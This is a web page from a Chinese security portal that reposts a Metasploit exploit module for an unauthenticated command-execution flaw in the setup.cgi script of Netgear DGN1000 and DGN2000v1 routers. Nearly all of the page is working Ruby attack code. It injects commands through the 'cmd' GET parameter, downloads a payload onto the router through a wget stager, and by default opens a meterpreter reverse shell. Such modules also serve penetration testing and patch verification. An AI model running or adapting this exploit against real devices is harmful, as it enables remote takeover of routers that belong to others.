首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Netgear DGN1000 Setup.cgi Remote Command Execution
来源:metasploit.com 作者:Mumbai 发布时间:2017-10-25  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated OS command execution vulneralbility
        in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
        DGN2000v1 models.
        },
      'Author' => [
        'Mumbai <https://github.com/realoriginal>', # module
        'Robort Palerie <roberto@greyhats.it>' # vuln discovery
      ],
      'References' => [
          ['EDB', '25978'],
      ],
      'DisclosureDate' => 'Jun 5 2013',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
      },
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET'
        })
      if res && res.headers['WWW-Authenticate']
        auth = res.headers['WWW-Authenticate']
        if auth =~ /DGN1000/
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Connecting to target...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
    end

    print_status("#{peer} - Exploiting target ....")
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200,
      :concat_operator => " && "
    )
  end

  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET',
        'vars_get' => {
          'next_file' => 'netgear.cfg',
          'todo' => 'syscmd',
          'cmd' => cmd.to_s,
          'curpath' => '/',
          'currentsetting.htm' => '1'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy MPEG/AVI/DIVX/WMV/RM To D
·Mikogo 5.4.1.160608 - Local Cr
·Windows NTLM Auth Hash Disclos
·Linux Kernel 4.14.0-rc4+ - 'wa
·PHPMailer 5.2.21 Local File Di
·Kaltura < 13.1.0 - Remote Code
·Watchdog Development Anti-Malw
·ArGoSoft Mini Mail Server 1.0.
·DameWare Remote Controller < 1
·Ayukov NFTP FTP Client < 2.0 -
·Tizen Studio 1.3 Smart Develop
·Unitrends UEB 9 HTTP API/Stora
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved